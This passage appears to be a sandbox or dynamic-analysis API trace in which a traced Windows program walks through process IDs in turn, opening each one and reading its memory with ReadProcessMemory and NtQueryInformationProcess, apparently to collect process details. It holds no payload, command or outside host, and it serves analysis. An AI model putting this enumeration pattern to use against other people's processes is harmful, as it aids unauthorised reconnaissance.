returned 1 [0264.741] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.741] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7f1c90, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.741] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7f1888, lpBuffer=0x138c580, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.741] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.742] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.742] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x501020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.742] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7f1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.742] malloc (_Size=0x78) returned 0xd9d190 [0264.742] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7f18f8, lpBuffer=0xd9d190, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.743] free (_Block=0xd9d190) [0264.743] CloseHandle (hObject=0x28c) returned 1 [0264.743] _ui64tow_s (in: _Value=0x1110, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4368") returned 0x0 [0264.743] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4368") returned 4 [0264.743] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.743] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1110) returned 0x28c [0264.745] GetLastError () returned 0x0 [0264.745] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.745] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x354018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.745] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.745] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6e1ca0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.745] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6e1888, lpBuffer=0x138c580, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.746] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.746] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.746] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x354020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.746] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6e1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.746] malloc (_Size=0x7c) returned 0xd9d190 [0264.746] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6e18fc, lpBuffer=0xd9d190, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.747] free (_Block=0xd9d190) [0264.747] CloseHandle (hObject=0x28c) returned 1 [0264.747] _ui64tow_s (in: _Value=0x1118, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4376") returned 0x0 [0264.748] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4376") returned 4 [0264.748] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.748] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.749] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1118) returned 0x28c [0264.749] GetLastError () returned 0x0 [0264.749] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.749] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x34e018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.749] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.749] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e1cb0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.749] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e1888, lpBuffer=0x138c580, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.750] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.750] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.750] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x34e020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.750] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.750] malloc (_Size=0x84) returned 0xd9d190 [0264.750] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e1904, lpBuffer=0xd9d190, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.751] free (_Block=0xd9d190) [0264.751] CloseHandle (hObject=0x28c) returned 1 [0264.751] _ui64tow_s (in: _Value=0x1120, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4384") returned 0x0 [0264.753] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4384") returned 4 [0264.754] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.754] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.755] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1120) returned 0x28c [0264.755] GetLastError () returned 0x0 [0264.755] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.755] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3cf018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.755] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.755] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6a1c60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.755] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6a1888, lpBuffer=0x138c580, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.756] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.756] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.756] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3cf020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.912] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6a1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.912] malloc (_Size=0x66) returned 0xdb02d0 [0264.912] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6a18e6, lpBuffer=0xdb02d0, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb02d0*, lpNumberOfBytesRead=0x0) returned 1 [0264.913] free (_Block=0xdb02d0) [0264.913] CloseHandle (hObject=0x28c) returned 1 [0264.924] _ui64tow_s (in: _Value=0x1128, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4392") returned 0x0 [0264.924] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4392") returned 4 [0264.924] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.925] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1128) returned 0x28c [0264.926] GetLastError () returned 0x0 [0264.926] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.926] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2b2018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.927] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.927] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1d1c60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.927] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1d1888, lpBuffer=0x138c580, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.927] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.928] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.928] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2b2020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.928] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1d1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.928] malloc (_Size=0x66) returned 0xdafe70 [0264.928] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1d18e6, lpBuffer=0xdafe70, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdafe70*, lpNumberOfBytesRead=0x0) returned 1 [0264.929] free (_Block=0xdafe70) [0264.929] CloseHandle (hObject=0x28c) returned 1 [0264.929] _ui64tow_s (in: _Value=0x1130, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4400") returned 0x0 [0264.930] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4400") returned 4 [0264.930] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.930] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.931] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1130) returned 0x28c [0264.931] GetLastError () returned 0x0 [0264.931] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.931] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5ae018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.932] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.932] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2d1cd0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.932] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2d1888, lpBuffer=0x138c580, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.932] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.933] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.934] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5ae020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.934] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2d1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.934] malloc (_Size=0x90) returned 0xd9d190 [0264.934] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2d1910, lpBuffer=0xd9d190, nSize=0x8e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.935] free (_Block=0xd9d190) [0264.935] CloseHandle (hObject=0x28c) returned 1 [0264.936] _ui64tow_s (in: _Value=0x1138, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4408") returned 0x0 [0264.936] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4408") returned 4 [0264.936] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.936] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.937] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1138) returned 0x28c [0264.937] GetLastError () returned 0x0 [0264.937] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.937] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3ac018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.938] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.938] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1c80, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.938] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1888, lpBuffer=0x138c580, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.938] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.939] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.939] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3ac020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.939] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.939] malloc (_Size=0x72) returned 0xd9d190 [0264.939] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b18f2, lpBuffer=0xd9d190, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.940] free (_Block=0xd9d190) [0264.940] CloseHandle (hObject=0x28c) returned 1 [0264.941] _ui64tow_s (in: _Value=0x1140, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4416") returned 0x0 [0264.941] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4416") returned 4 [0264.941] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.941] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.943] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1140) returned 0x28c [0264.943] GetLastError () returned 0x0 [0264.943] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.943] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2b1018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.943] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.943] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1e1c50, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.944] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1e1888, lpBuffer=0x138c580, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.944] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.944] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.944] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2b1020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.945] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1e1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.945] malloc (_Size=0x64) returned 0xdb02d0 [0264.945] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1e18e4, lpBuffer=0xdb02d0, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb02d0*, lpNumberOfBytesRead=0x0) returned 1 [0264.946] free (_Block=0xdb02d0) [0264.946] CloseHandle (hObject=0x28c) returned 1 [0264.946] _ui64tow_s (in: _Value=0x1148, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4424") returned 0x0 [0264.947] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4424") returned 4 [0264.947] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.947] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.948] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1148) returned 0x28c [0264.948] GetLastError () returned 0x0 [0264.948] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.948] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2fa018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.948] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.949] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x551c80, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.949] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x551888, lpBuffer=0x138c580, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: 